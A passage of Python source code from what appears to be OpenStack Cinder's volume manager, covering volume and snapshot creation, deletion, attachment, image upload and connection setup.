**kwargs)
def init_host_with_rpc(self):
LOG.info(_LI("Initializing RPC dependent components of volume "
"driver %(driver_name)s (%(version)s)"),
{'driver_name': self.driver.__class__.__name__,
'version': self.driver.get_version()})
try:
# Make sure the driver is initialized first
utils.log_unsupported_driver_warning(self.driver)
utils.require_driver_initialized(self.driver)
except exception.DriverNotInitialized:
LOG.error(_LE("Cannot complete RPC initialization because "
"driver isn't initialized properly."),
resource={'type': 'driver',
'id': self.driver.__class__.__name__})
return
stats = self.driver.get_volume_stats(refresh=True)
svc_host = vol_utils.extract_host(self.host, 'backend')
try:
service = objects.Service.get_by_args(
context.get_admin_context(),
svc_host,
constants.VOLUME_BINARY)
except exception.ServiceNotFound:
with excutils.save_and_reraise_exception():
LOG.error(_LE("Service not found for updating "
"replication_status."))
if service.replication_status != (
fields.ReplicationStatus.FAILED_OVER):
if stats and stats.get('replication_enabled', False):
service.replication_status = fields.ReplicationStatus.ENABLED
else:
service.replication_status = fields.ReplicationStatus.DISABLED
service.save()
LOG.info(_LI("Driver post RPC initialization completed successfully."),
resource={'type': 'driver',
'id': self.driver.__class__.__name__})
def _do_cleanup(self, ctxt, vo_resource):
if isinstance(vo_resource, objects.Volume):
if vo_resource.status == 'downloading':
self.driver.clear_download(ctxt, vo_resource)
elif vo_resource.status == 'uploading':
# Set volume status to available or in-use.
self.db.volume_update_status_based_on_attachment(
ctxt, vo_resource.id)
elif vo_resource.status == 'deleting':
if CONF.volume_service_inithost_offload:
# Offload all the pending volume delete operations to the
# threadpool to prevent the main volume service thread
# from being blocked.
self._add_to_threadpool(self.delete_volume, ctxt,
vo_resource, cascade=True)
else:
# By default, delete volumes sequentially
self.delete_volume(ctxt, vo_resource, cascade=True)
# We signal that we take care of cleaning the worker ourselves
# (with set_workers decorator in delete_volume method) so
# do_cleanup method doesn't need to remove it.
return True
# For Volume creating and downloading and for Snapshot downloading
# statuses we have to set status to error
if vo_resource.status in ('creating', 'downloading'):
vo_resource.status = 'error'
vo_resource.save()
def is_working(self):
"""Return if Manager is ready to accept requests.
This is to inform Service class that in case of volume driver
initialization failure the manager is actually down and not ready to
accept any requests.
"""
return self.driver.initialized
def _set_resource_host(self, resource):
"""Set the host field on the DB to our own when we are clustered."""
if (resource.is_clustered and
not vol_utils.hosts_are_equivalent(resource.host, self.host)):
pool = vol_utils.extract_host(resource.host, 'pool')
resource.host = vol_utils.append_host(self.host, pool)
resource.save()
@objects.Volume.set_workers
def create_volume(self, context, volume, request_spec=None,
filter_properties=None, allow_reschedule=True):
"""Creates the volume."""
# Log about unsupported drivers
utils.log_unsupported_driver_warning(self.driver)
# Make sure the host in the DB matches our own when clustered
self._set_resource_host(volume)
context_elevated = context.elevated()
if filter_properties is None:
filter_properties = {}
if request_spec is None:
request_spec = objects.RequestSpec()
try:
# NOTE(flaper87): Driver initialization is
# verified by the task itself.
flow_engine = create_volume.get_flow(
context_elevated,
self,
self.db,
self.driver,
self.scheduler_rpcapi,
self.host,
volume,
allow_reschedule,
context,
request_spec,
filter_properties,
image_volume_cache=self.image_volume_cache,
)
except Exception:
msg = _("Create manager volume flow failed.")
LOG.exception(msg, resource={'type': 'volume', 'id': volume.id})
raise exception.CinderException(msg)
snapshot_id = request_spec.get('snapshot_id')
source_volid = request_spec.get('source_volid')
source_replicaid = request_spec.get('source_replicaid')
if snapshot_id is not None:
# Make sure the snapshot is not deleted until we are done with it.
locked_action = "%s-%s" % (snapshot_id, 'delete_snapshot')
elif source_volid is not None:
# Make sure the volume is not deleted until we are done with it.
locked_action = "%s-%s" % (source_volid, 'delete_volume')
elif source_replicaid is not None:
# Make sure the volume is not deleted until we are done with it.
locked_action = "%s-%s" % (source_replicaid, 'delete_volume')
else:
locked_action = None
def _run_flow():
# This code executes create volume flow. If something goes wrong,
# flow reverts all job that was done and reraises an exception.
# Otherwise, all data that was generated by flow becomes available
# in flow engine's storage.
with flow_utils.DynamicLogListener(flow_engine, logger=LOG):
flow_engine.run()
# NOTE(dulek): Flag to indicate if volume was rescheduled. Used to
# decide if allocated_capacity should be incremented.
rescheduled = False
try:
if locked_action is None:
_run_flow()
else:
with coordination.Lock(locked_action):
_run_flow()
finally:
try:
flow_engine.storage.fetch('refreshed')
except tfe.NotFound:
# If there's no vol_ref, then flow is reverted. Lets check out
# if rescheduling occurred.
try:
rescheduled = flow_engine.storage.get_revert_result(
create_volume.OnFailureRescheduleTask.make_name(
[create_volume.ACTION]))
except tfe.NotFound:
pass
if not rescheduled:
# NOTE(dulek): Volume wasn't rescheduled so we need to update
# volume stats as these are decremented on delete.
self._update_allocated_capacity(volume)
LOG.info(_LI("Created volume successfully."), resource=volume)
return volume.id
def _check_is_our_resource(self, resource):
if resource.host:
res_backend = vol_utils.extract_host(resource.service_topic_queue)
backend = vol_utils.extract_host(self.service_topic_queue)
if res_backend != backend:
msg = (_('Invalid %(resource)s: %(resource)s %(id)s is not '
'local to %(backend)s.') %
{'resource': resource.obj_name, 'id': resource.id,
'backend': backend})
raise exception.Invalid(msg)
@coordination.synchronized('{volume.id}-{f_name}')
@objects.Volume.set_workers
def delete_volume(self, context, volume, unmanage_only=False,
cascade=False):
"""Deletes and unexports volume.
1. Delete a volume(normal case)
Delete a volume and update quotas.
2. Delete a migration volume
If deleting the volume in a migration, we want to skip
quotas but we need database updates for the volume.
"""
context = context.elevated()
try:
volume.refresh()
except exception.VolumeNotFound:
# NOTE(thingee): It could be possible for a volume to
# be deleted when resuming deletes from init_host().
LOG.debug("Attempted delete of non-existent volume: %s", volume.id)
return
if context.project_id != volume.project_id:
project_id = volume.project_id
else:
project_id = context.project_id
if volume['attach_status'] == fields.VolumeAttachStatus.ATTACHED:
# Volume is still attached, need to detach first
raise exception.VolumeAttached(volume_id=volume.id)
self._check_is_our_resource(volume)
if unmanage_only and cascade:
# This could be done, but is ruled out for now just
# for simplicity.
raise exception.Invalid(
reason=_("Unmanage and cascade delete options "
"are mutually exclusive."))
# The status 'deleting' is not included, because it only applies to
# the source volume to be deleted after a migration. No quota
# needs to be handled for it.
is_migrating = volume.migration_status not in (None, 'error',
'success')
is_migrating_dest = (is_migrating and
volume.migration_status.startswith(
'target:'))
notification = "delete.start"
if unmanage_only:
notification = "unmanage.start"
self._notify_about_volume_usage(context, volume, notification)
try:
# NOTE(flaper87): Verify the driver is enabled
# before going forward. The exception will be caught
# and the volume status updated.
utils.require_driver_initialized(self.driver)
self.driver.remove_export(context, volume)
if unmanage_only:
self.driver.unmanage(volume)
elif cascade:
LOG.debug('Performing cascade delete.')
snapshots = objects.SnapshotList.get_all_for_volume(context,
volume.id)
for s in snapshots:
if s.status != 'deleting':
self._clear_db(context, is_migrating_dest, volume,
'error_deleting')
msg = (_("Snapshot %(id)s was found in state "
"%(state)s rather than 'deleting' during "
"cascade delete.") % {'id': s.id,
'state': s.status})
raise exception.InvalidSnapshot(reason=msg)
self.delete_snapshot(context, s)
LOG.debug('Snapshots deleted, issuing volume delete')
self.driver.delete_volume(volume)
else:
self.driver.delete_volume(volume)
except exception.VolumeIsBusy:
LOG.error(_LE("Unable to delete busy volume."),
resource=volume)
# If this is a destination volume, we have to clear the database
# record to avoid user confusion.
self._clear_db(context, is_migrating_dest, volume,
'available')
return
except Exception:
with excutils.save_and_reraise_exception():
# If this is a destination volume, we have to clear the
# database record to avoid user confusion.
new_status = 'error_deleting'
if unmanage_only is True:
new_status = 'error_unmanaging'
self._clear_db(context, is_migrating_dest, volume,
new_status)
# If deleting source/destination volume in a migration, we should
# skip quotas.
if not is_migrating:
# Get reservations
try:
reservations = None
if volume.status != 'error_managing_deleting':
reserve_opts = {'volumes': -1,
'gigabytes': -volume.size}
QUOTAS.add_volume_type_opts(context,
reserve_opts,
volume.volume_type_id)
reservations = QUOTAS.reserve(context,
project_id=project_id,
**reserve_opts)
except Exception:
LOG.exception(_LE("Failed to update usages deleting volume."),
resource=volume)
# Delete glance metadata if it exists
self.db.volume_glance_metadata_delete_by_volume(context, volume.id)
volume.destroy()
# If deleting source/destination volume in a migration, we should
# skip quotas.
if not is_migrating:
notification = "delete.end"
if unmanage_only:
notification = "unmanage.end"
self._notify_about_volume_usage(context, volume, notification)
# Commit the reservations
if reservations:
QUOTAS.commit(context, reservations, project_id=project_id)
pool = vol_utils.extract_host(volume.host, 'pool')
if pool is None:
# Legacy volume, put them into default pool
pool = self.driver.configuration.safe_get(
'volume_backend_name') or vol_utils.extract_host(
volume.host, 'pool', True)
size = volume.size
try:
self.stats['pools'][pool]['allocated_capacity_gb'] -= size
except KeyError:
self.stats['pools'][pool] = dict(
allocated_capacity_gb=-size)
self.publish_service_capabilities(context)
msg = _LI("Deleted volume successfully.")
if unmanage_only:
msg = _LI("Unmanaged volume successfully.")
LOG.info(msg, resource=volume)
def _clear_db(self, context, is_migrating_dest, volume_ref, status):
# This method is called when driver.unmanage() or
# driver.delete_volume() fails in delete_volume(), so it is already
# in the exception handling part.
if is_migrating_dest:
volume_ref.destroy()
LOG.error(_LE("Unable to delete the destination volume "
"during volume migration, (NOTE: database "
"record needs to be deleted)."), resource=volume_ref)
else:
volume_ref.status = status
volume_ref.save()
@objects.Snapshot.set_workers
def create_snapshot(self, context, snapshot):
"""Creates and exports the snapshot."""
context = context.elevated()
self._notify_about_snapshot_usage(
context, snapshot, "create.start")
try:
# NOTE(flaper87): Verify the driver is enabled
# before going forward. The exception will be caught
# and the snapshot status updated.
utils.require_driver_initialized(self.driver)
# Pass context so that drivers that want to use it, can,
# but it is not a requirement for all drivers.
snapshot.context = context
model_update = self.driver.create_snapshot(snapshot)
if model_update:
snapshot.update(model_update)
snapshot.save()
except Exception:
with excutils.save_and_reraise_exception():
snapshot.status = fields.SnapshotStatus.ERROR
snapshot.save()
vol_ref = self.db.volume_get(context, snapshot.volume_id)
if vol_ref.bootable:
try:
self.db.volume_glance_metadata_copy_to_snapshot(
context, snapshot.id, snapshot.volume_id)
except exception.GlanceMetadataNotFound:
# If volume is not created from image, No glance metadata
# would be available for that volume in
# volume glance metadata table
pass
except exception.CinderException as ex:
LOG.exception(_LE("Failed updating snapshot"
" metadata using the provided volumes"
" %(volume_id)s metadata"),
{'volume_id': snapshot.volume_id},
resource=snapshot)
snapshot.status = fields.SnapshotStatus.ERROR
snapshot.save()
raise exception.MetadataCopyFailure(reason=six.text_type(ex))
snapshot.status = fields.SnapshotStatus.AVAILABLE
snapshot.progress = '100%'
snapshot.save()
self._notify_about_snapshot_usage(context, snapshot, "create.end")
LOG.info(_LI("Create snapshot completed successfully"),
resource=snapshot)
return snapshot.id
@coordination.synchronized('{snapshot.id}-{f_name}')
def delete_snapshot(self, context, snapshot, unmanage_only=False):
"""Deletes and unexports snapshot."""
context = context.elevated()
snapshot._context = context
project_id = snapshot.project_id
self._notify_about_snapshot_usage(
context, snapshot, "delete.start")
try:
# NOTE(flaper87): Verify the driver is enabled
# before going forward. The exception will be caught
# and the snapshot status updated.
utils.require_driver_initialized(self.driver)
# Pass context so that drivers that want to use it, can,
# but it is not a requirement for all drivers.
snapshot.context = context
snapshot.save()
if unmanage_only:
self.driver.unmanage_snapshot(snapshot)
else:
self.driver.delete_snapshot(snapshot)
except exception.SnapshotIsBusy:
LOG.error(_LE("Delete snapshot failed, due to snapshot busy."),
resource=snapshot)
snapshot.status = fields.SnapshotStatus.AVAILABLE
snapshot.save()
return
except Exception:
with excutils.save_and_reraise_exception():
snapshot.status = fields.SnapshotStatus.ERROR_DELETING
snapshot.save()
# Get reservations
try:
if CONF.no_snapshot_gb_quota:
reserve_opts = {'snapshots': -1}
else:
reserve_opts = {
'snapshots': -1,
'gigabytes': -snapshot.volume_size,
}
volume_ref = self.db.volume_get(context, snapshot.volume_id)
QUOTAS.add_volume_type_opts(context,
reserve_opts,
volume_ref.get('volume_type_id'))
reservations = QUOTAS.reserve(context,
project_id=project_id,
**reserve_opts)
except Exception:
reservations = None
LOG.exception(_LE("Update snapshot usages failed."),
resource=snapshot)
self.db.volume_glance_metadata_delete_by_snapshot(context, snapshot.id)
snapshot.destroy()
self._notify_about_snapshot_usage(context, snapshot, "delete.end")
# Commit the reservations
if reservations:
QUOTAS.commit(context, reservations, project_id=project_id)
msg = _LI("Delete snapshot completed successfully.")
if unmanage_only:
msg = _LI("Unmanage snapshot completed successfully.")
LOG.info(msg, resource=snapshot)
@coordination.synchronized('{volume_id}')
def attach_volume(self, context, volume_id, instance_uuid, host_name,
mountpoint, mode, volume=None):
"""Updates db to show volume is attached."""
# FIXME(lixiaoy1): Remove this in v4.0 of RPC API.
if volume is None:
# For older clients, mimic the old behavior and look
# up the volume by its volume_id.
volume = objects.Volume.get_by_id(context, volume_id)
# Get admin_metadata. This needs admin context.
with volume.obj_as_admin():
volume_metadata = volume.admin_metadata
# check the volume status before attaching
if volume.status == 'attaching':
if (volume_metadata.get('attached_mode') and
volume_metadata.get('attached_mode') != mode):
raise exception.InvalidVolume(
reason=_("being attached by different mode"))
if (volume.status == 'in-use' and not volume.multiattach
and not volume.migration_status):
raise exception.InvalidVolume(
reason=_("volume is already attached"))
host_name_sanitized = utils.sanitize_hostname(
host_name) if host_name else None
if instance_uuid:
attachments = (
VA_LIST.get_all_by_instance_uuid(
context, instance_uuid))
else:
attachments = (
VA_LIST.get_all_by_host(
context, host_name_sanitized))
if attachments:
# check if volume<->instance mapping is already tracked in DB
for attachment in attachments:
if attachment['volume_id'] == volume_id:
volume.status = 'in-use'
volume.save()
return attachment
self._notify_about_volume_usage(context, volume,
"attach.start")
attachment = volume.begin_attach(mode)
if instance_uuid and not uuidutils.is_uuid_like(instance_uuid):
attachment.attach_status = (
fields.VolumeAttachStatus.ERROR_ATTACHING)
attachment.save()
raise exception.InvalidUUID(uuid=instance_uuid)
if volume_metadata.get('readonly') == 'True' and mode != 'ro':
attachment.attach_status = (
fields.VolumeAttachStatus.ERROR_ATTACHING)
attachment.save()
self.message_api.create(
context, defined_messages.EventIds.ATTACH_READONLY_VOLUME,
context.project_id, resource_type=resource_types.VOLUME,
resource_uuid=volume.id)
raise exception.InvalidVolumeAttachMode(mode=mode,
volume_id=volume.id)
try:
# NOTE(flaper87): Verify the driver is enabled
# before going forward. The exception will be caught
# and the volume status updated.
utils.require_driver_initialized(self.driver)
LOG.info(_LI('Attaching volume %(volume_id)s to instance '
'%(instance)s at mountpoint %(mount)s on host '
'%(host)s.'),
{'volume_id': volume_id, 'instance': instance_uuid,
'mount': mountpoint, 'host': host_name_sanitized},
resource=volume)
self.driver.attach_volume(context,
volume,
instance_uuid,
host_name_sanitized,
mountpoint)
except Exception:
with excutils.save_and_reraise_exception():
attachment.attach_status = (
fields.VolumeAttachStatus.ERROR_ATTACHING)
attachment.save()
volume = attachment.finish_attach(
instance_uuid,
host_name_sanitized,
mountpoint,
mode)
self._notify_about_volume_usage(context, volume, "attach.end")
LOG.info(_LI("Attach volume completed successfully."),
resource=volume)
return attachment
@coordination.synchronized('{volume_id}-{f_name}')
def detach_volume(self, context, volume_id, attachment_id=None,
volume=None):
"""Updates db to show volume is detached."""
# TODO(vish): refactor this into a more general "unreserve"
# FIXME(lixiaoy1): Remove this in v4.0 of RPC API.
if volume is None:
# For older clients, mimic the old behavior and look up the volume
# by its volume_id.
volume = objects.Volume.get_by_id(context, volume_id)
if attachment_id:
try:
attachment = objects.VolumeAttachment.get_by_id(context,
attachment_id)
except exception.VolumeAttachmentNotFound:
LOG.info(_LI("Volume detach called, but volume not attached."),
resource=volume)
# We need to make sure the volume status is set to the correct
# status. It could be in detaching status now, and we don't
# want to leave it there.
volume.finish_detach(attachment_id)
return
else:
# We can try and degrade gracefully here by trying to detach
# a volume without the attachment_id here if the volume only has
# one attachment. This is for backwards compatibility.
attachments = volume.volume_attachment
if len(attachments) > 1:
# There are more than 1 attachments for this volume
# we have to have an attachment id.
msg = _("Detach volume failed: More than one attachment, "
"but no attachment_id provided.")
LOG.error(msg, resource=volume)
raise exception.InvalidVolume(reason=msg)
elif len(attachments) == 1:
attachment = attachments[0]
else:
# there aren't any attachments for this volume.
# so set the status to available and move on.
LOG.info(_LI("Volume detach called, but volume not attached."),
resource=volume)
volume.status = 'available'
volume.attach_status = fields.VolumeAttachStatus.DETACHED
volume.save()
return
self._notify_about_volume_usage(context, volume, "detach.start")
try:
# NOTE(flaper87): Verify the driver is enabled
# before going forward. The exception will be caught
# and the volume status updated.
utils.require_driver_initialized(self.driver)
LOG.info(_LI('Detaching volume %(volume_id)s from instance '
'%(instance)s.'),
{'volume_id': volume_id,
'instance': attachment.get('instance_uuid')},
resource=volume)
self.driver.detach_volume(context, volume, attachment)
except Exception:
with excutils.save_and_reraise_exception():
self.db.volume_attachment_update(
context, attachment.get('id'), {
'attach_status':
fields.VolumeAttachStatus.ERROR_DETACHING})
# NOTE(jdg): We used to do an ensure export here to
# catch upgrades while volumes were attached (E->F)
# this was necessary to convert in-use volumes from
# int ID's to UUID's. Don't need this any longer
# We're going to remove the export here
# (delete the iscsi target)
try:
utils.require_driver_initialized(self.driver)
self.driver.remove_export(context.elevated(), volume)
except exception.DriverNotInitialized:
with excutils.save_and_reraise_exception():
LOG.exception(_LE("Detach volume failed, due to "
"uninitialized driver."),
resource=volume)
except Exception as ex:
LOG.exception(_LE("Detach volume failed, due to "
"remove-export failure."),
resource=volume)
raise exception.RemoveExportException(volume=volume_id,
reason=six.text_type(ex))
volume.finish_detach(attachment.id)
self._notify_about_volume_usage(context, volume, "detach.end")
LOG.info(_LI("Detach volume completed successfully."), resource=volume)
def _create_image_cache_volume_entry(self, ctx, volume_ref,
image_id, image_meta):
"""Create a new image-volume and cache entry for it.
This assumes that the image has already been downloaded and stored
in the volume described by the volume_ref.
"""
image_volume = None
try:
if not self.image_volume_cache.ensure_space(ctx, volume_ref):
LOG.warning(_LW('Unable to ensure space for image-volume in'
' cache. Will skip creating entry for image'
' %(image)s on %(service)s.'),
{'image': image_id,
'service': volume_ref.service_topic_queue})
return
image_volume = self._clone_image_volume(ctx,
volume_ref,
image_meta)
if not image_volume:
LOG.warning(_LW('Unable to clone image_volume for image '
'%(image_id)s will not create cache entry.'),
{'image_id': image_id})
return
self.image_volume_cache.create_cache_entry(
ctx,
image_volume,
image_id,
image_meta
)
except exception.CinderException as e:
LOG.warning(_LW('Failed to create new image-volume cache entry.'
' Error: %(exception)s'), {'exception': e})
if image_volume:
self.delete_volume(ctx, image_volume)
def _clone_image_volume(self, ctx, volume, image_meta):
volume_type_id = volume.get('volume_type_id')
reserve_opts = {'volumes': 1, 'gigabytes': volume.size}
QUOTAS.add_volume_type_opts(ctx, reserve_opts, volume_type_id)
reservations = QUOTAS.reserve(ctx, **reserve_opts)
try:
new_vol_values = {k: volume[k] for k in set(volume.keys()) -
self._VOLUME_CLONE_SKIP_PROPERTIES}
new_vol_values['volume_type_id'] = volume_type_id
new_vol_values['attach_status'] = (
fields.VolumeAttachStatus.DETACHED)
new_vol_values['status'] = 'creating'
new_vol_values['project_id'] = ctx.project_id
new_vol_values['display_name'] = 'image-%s' % image_meta['id']
new_vol_values['source_volid'] = volume.id
LOG.debug('Creating image volume entry: %s.', new_vol_values)
image_volume = objects.Volume(context=ctx, **new_vol_values)
image_volume.create()
except Exception as ex:
LOG.exception(_LE('Create clone_image_volume: %(volume_id)s'
'for image %(image_id)s, '
'failed (Exception: %(except)s)'),
{'volume_id': volume.id,
'image_id': image_meta['id'],
'except': ex})
QUOTAS.rollback(ctx, reservations)
return
QUOTAS.commit(ctx, reservations,
project_id=new_vol_values['project_id'])
try:
self.create_volume(ctx, image_volume, allow_reschedule=False)
image_volume = objects.Volume.get_by_id(ctx, image_volume.id)
if image_volume.status != 'available':
raise exception.InvalidVolume(_('Volume is not available.'))
self.db.volume_admin_metadata_update(ctx.elevated(),
image_volume.id,
{'readonly': 'True'},
False)
return image_volume
except exception.CinderException:
LOG.exception(_LE('Failed to clone volume %(volume_id)s for '
'image %(image_id)s.'),
{'volume_id': volume.id,
'image_id': image_meta['id']})
try:
self.delete_volume(ctx, image_volume)
except exception.CinderException:
LOG.exception(_LE('Could not delete the image volume %(id)s.'),
{'id': volume.id})
return
def _clone_image_volume_and_add_location(self, ctx, volume, image_service,
image_meta):
"""Create a cloned volume and register its location to the image."""
if (image_meta['disk_format'] != 'raw' or
image_meta['container_format'] != 'bare'):
return False
image_volume_context = ctx
if self.driver.configuration.image_upload_use_internal_tenant:
internal_ctx = context.get_internal_tenant_context()
if internal_ctx:
image_volume_context = internal_ctx
image_volume = self._clone_image_volume(image_volume_context,
volume,
image_meta)
if not image_volume:
return False
# The image_owner metadata should be set before uri is added to
# the image so glance cinder store can check its owner.
image_volume_meta = {'image_owner': ctx.project_id}
self.db.volume_metadata_update(image_volume_context,
image_volume.id,
image_volume_meta,
False)
uri = 'cinder://%s' % image_volume.id
image_registered = None
try:
image_registered = image_service.add_location(
ctx, image_meta['id'], uri, {})
except (exception.NotAuthorized, exception.Invalid,
exception.NotFound):
LOG.exception(_LE('Failed to register image volume location '
'%(uri)s.'), {'uri': uri})
if not image_registered:
LOG.warning(_LW('Registration of image volume URI %(uri)s '
'to image %(image_id)s failed.'),
{'uri': uri, 'image_id': image_meta['id']})
try:
self.delete_volume(image_volume_context, image_volume)
except exception.CinderException:
LOG.exception(_LE('Could not delete failed image volume '
'%(id)s.'), {'id': image_volume.id})
return False
image_volume_meta['glance_image_id'] = image_meta['id']
self.db.volume_metadata_update(image_volume_context,
image_volume.id,
image_volume_meta,
False)
return True
def copy_volume_to_image(self, context, volume_id, image_meta):
"""Uploads the specified volume to Glance.
image_meta is a dictionary containing the following keys:
'id', 'container_format', 'disk_format'
"""
payload = {'volume_id': volume_id, 'image_id': image_meta['id']}
image_service = None
try:
volume = objects.Volume.get_by_id(context, volume_id)
# NOTE(flaper87): Verify the driver is enabled
# before going forward. The exception will be caught
# and the volume status updated.
utils.require_driver_initialized(self.driver)
image_service, image_id = \
glance.get_remote_image_service(context, image_meta['id'])
if (self.driver.configuration.image_upload_use_cinder_backend
and self._clone_image_volume_and_add_location(
context, volume, image_service, image_meta)):
LOG.debug("Registered image volume location to glance "
"image-id: %(image_id)s.",
{'image_id': image_meta['id']},
resource=volume)
else:
self.driver.copy_volume_to_image(context, volume,
image_service, image_meta)
LOG.debug("Uploaded volume to glance image-id: %(image_id)s.",
{'image_id': image_meta['id']},
resource=volume)
except Exception as error:
LOG.error(_LE("Upload volume to image encountered an error "
"(image-id: %(image_id)s)."),
{'image_id': image_meta['id']},
resource=volume)
if image_service is not None:
# Deletes the image if it is in queued or saving state
self._delete_image(context, image_meta['id'], image_service)
with excutils.save_and_reraise_exception():
payload['message'] = six.text_type(error)
if isinstance(error, exception.ImageLimitExceeded):
self.message_api.create(
context,
defined_messages.EventIds.IMAGE_FROM_VOLUME_OVER_QUOTA,
context.project_id,
resource_type=resource_types.VOLUME,
resource_uuid=volume_id)
finally:
self.db.volume_update_status_based_on_attachment(context,
volume_id)
LOG.info(_LI("Copy volume to image completed successfully."),
resource=volume)
def _delete_image(self, context, image_id, image_service):
"""Deletes an image stuck in queued or saving state."""
try:
image_meta = image_service.show(context, image_id)
image_status = image_meta.get('status')
if image_status == 'queued' or image_status == 'saving':
LOG.warning(_LW("Deleting image in unexpected status: "
"%(image_status)s."),
{'image_status': image_status},
resource={'type': 'image', 'id': image_id})
image_service.delete(context, image_id)
except Exception:
LOG.warning(_LW("Image delete encountered an error."),
exc_info=True, resource={'type': 'image',
'id': image_id})
def _parse_connection_options(self, context, volume, conn_info):
# Add qos_specs to connection info
typeid = volume.volume_type_id
specs = None
if typeid:
res = volume_types.get_volume_type_qos_specs(typeid)
qos = res['qos_specs']
# only pass qos_specs that is designated to be consumed by
# front-end, or both front-end and back-end.
if qos and qos.get('consumer') in ['front-end', 'both']:
specs = qos.get('specs')
qos_spec = dict(qos_specs=specs)
conn_info['data'].update(qos_spec)
# Add access_mode to connection info
volume_metadata = volume.admin_metadata
access_mode = volume_metadata.get('attached_mode')
if access_mode is None:
# NOTE(zhiyan): client didn't call 'os-attach' before
access_mode = ('ro'
if volume_metadata.get('readonly') == 'True'
else 'rw')
conn_info['data']['access_mode'] = access_mode
# Add encrypted flag to connection_info if not set in the driver.
if conn_info['data'].get('encrypted') is None:
encrypted = bool(volume.encryption_key_id)
conn_info['data']['encrypted'] = encrypted
# Add discard flag to connection_info if not set in the driver and
# configured to be reported.
if conn_info['data'].get('discard') is None:
discard_supported = (self.driver.configuration
.safe_get('report_discard_supported'))
if discard_supported:
conn_info['data']['discard'] = True
return conn_info
def initialize_connection(self, context, volume, connector):
"""Prepare volume for connection from host represented by connector.
This method calls the driver initialize_connection and returns
it to the caller. The connector parameter is a dictionary with
information about the host that will connect to the volume in the
following format::
{
'ip': ip,
'initiator': initiator,
}
ip: the ip address of the connecting machine
initiator: the iscsi initiator name of the connecting machine.
This can be None if the connecting machine does not support iscsi
connections.
driver is responsible for doing any necessary security setup and
returning a connection_info dictionary in the following format::
{
'driver_volume_type': driver_volume_type,
'data': data,
}
driver_volume_type: a string to identify the type of volume. This
can be used by the calling code to determine the
strategy for connecting to the volume. This could
be 'iscsi', 'rbd', 'sheepdog', etc.
data: this is the data that the calling code will use to connect
to the volume. Keep in mind that this will be serialized to
json in various places, so it should not contain any non-json
data types.
"""
# NOTE(flaper87): Verify the driver is enabled
# before going forward. The exception will be caught
# and the volume status updated.
# TODO(jdg): Add deprecation warning
utils.require_driver_initialized(self.driver)
try:
self.driver.validate_connector(connector)
except exception.InvalidConnectorException as err:
raise exception.InvalidInput(reason=six.text_type(err))
except Exception as err:
err_msg = (_("Validate volume connection failed "
"(error: %(err)s).") % {'err': six.text_type(err)})
LOG.exception(err_msg, resource=volume)
raise exception.VolumeBackendAPIException(data=err_msg)
try:
model_update = self.driver.create_export(context.elevated(),
volume, connector)
except exception.CinderException as ex:
msg = _("Create export of volume failed (%s)") % ex.msg
LOG.exception(msg, resource=volume)
raise exception.VolumeBackendAPIException(data=msg)
try:
if model_update:
volume.update(model_update)
volume.save()
except exception.CinderException as ex:
LOG.exception(_LE("Model update failed."), resource=volume)
raise exception.ExportFailure(reason=six.text_type(ex))
try:
conn_info = self.driver.initialize_connection(volume, connector)
except Exception as err:
err_msg = (_("Driver initialize connection failed "
"(error: %(err)s).") % {'err': six.text_type(err)})
LOG.exception(err_msg, resource=volume)
self.driver.remove_export(context.elevated(), volume)
raise exception.VolumeBackendAPIException(data=err_msg)
conn_info = self._parse_connection_options(context, volume, conn_info)
LOG.info(_LI("Initialize volume connection completed successfully."),
resource=volume)
return conn_info
def terminate_connection(self, context, volume_id, connector, force=False):
"""Cleanup connection from host represented by connector.
The format of connector is the same as for initialize_connection.
"""
# NOTE(flaper87): Verify the driver is enabled
# before going forward. The exception will be caught
# and the volume status updated.
utils.require_driver_initialized(self.driver)
volume_ref = self.db.volume_get(context, volume_id)
try:
self.driver.terminate_connection(volume_ref, connector,
force=force)
except Exception as err:
err_msg = (_('Terminate volume connection failed: %(err)s')
% {'err': six.text_type(err)})
LOG.exception(err_msg, resource=volume_ref)
raise exception.VolumeBackendAPIException(data=err_msg)
LOG.info(_LI("Terminate volume connection completed successfully."),
resource=volume_ref)
def remove_export(self, context, volume_id):
"""Removes an export for a volume."""
utils.require_driver_initialized(self.driver)
volume_ref = self.db.volume_get(context, volume_id)
try:
self.driver.remove_export(context, volume_ref)
except Exception:
msg = _("Remove volume export failed.")
LOG.exception(msg, resource=volume_ref)
raise exception.VolumeBackendAPIException(data=msg)
LOG.info(_LI("Remove volume export completed successfully."),
resource=volume_ref)
def accept_transfer(self, context, volume_id, new_user, new_project):
# NOTE(flaper87): Verify the driver is enabled
# before going forward. The exception will be caught
# and the volume status updated.
utils.require_driver_initialized(self.driver)
# NOTE(jdg): need elevated context as we haven't "given" the vol
# yet
volume_ref = self.db.volume_get(context.elevated(), volume_id)
# NOTE(jdg): Some drivers tie provider info (CHAP) to tenant
# for those that do allow them to return updated model info
model_update = self.driver.accept_transfer(context,
volume_ref,
new_user,
new_project)
if model_update:
try:
self.db.volume_update(context.elevated(),
volume_id,
model_update)
except exception.CinderException:
with excutils.save_and_reraise_exception():
LOG.exception(_LE("Update volume model for "
"transfer operation failed."),
resource=volume_ref)
self.db.volume_update(context.elevated(),
volume_id,
{'status': 'error'})
LOG.info(_LI("Transfer volume completed successfully."),
resource=volume_ref)
return model_update
def _connect_device(self, conn):
use_multipath = self.configuration.use_multipath_for_image_xfer
device_scan_attempts = self.configuration.num_volume_device_scan_tries
protocol = conn['driver_volume_type']
connector = utils.brick_get_connector(
protocol,
use_multipath=use_multipath,
device_scan_attempts=device_scan_attempts,
conn=conn)
vol_handle = connector.connect_volume(conn['data'])
root_access = True
if not connector.check_valid_device(vol_handle['path'], root_access):
if isinstance(vol_handle['path'], six.string_types):
raise exception.DeviceUnavailable(
path=vol_handle['path'],
reason=(_("Unable to access the backend storage via the "
"path %(path)s.") %
{'path': vol_handle['path']}))
else:
raise exception.DeviceUnavailable(
path=None,
reason=(_("Unable to access the backend storage via file "
"handle.")))
return {'conn': conn, 'device': vol_handle, 'connector': connector}
def _attach_volume(self, ctxt, volume, properties, remote=False,
attach_encryptor=False):
status = volume['status']
if remote:
rpcapi = volume_rpcapi.VolumeAPI()
try:
conn = rpcapi.initialize_connection(ctxt, volume, properties)
except Exception:
with excutils.save_and_reraise_exception():
LOG.error(_LE("Failed to attach volume %(vol)s."),
{'vol': volume['id']})
self.db.volume_update(ctxt, volume['id'],
{'status': status})
else:
conn = self.initialize_connection(ctxt, volume, properties)
attach_info = self._connect_device(conn)
try:
if attach_encryptor and (
volume_types.is_encrypted(ctxt,
volume.volume_type_id)):
encryption = self.db.volume_encryption_metadata_get(
ctxt.elevated(), volume.id)
if encryption:
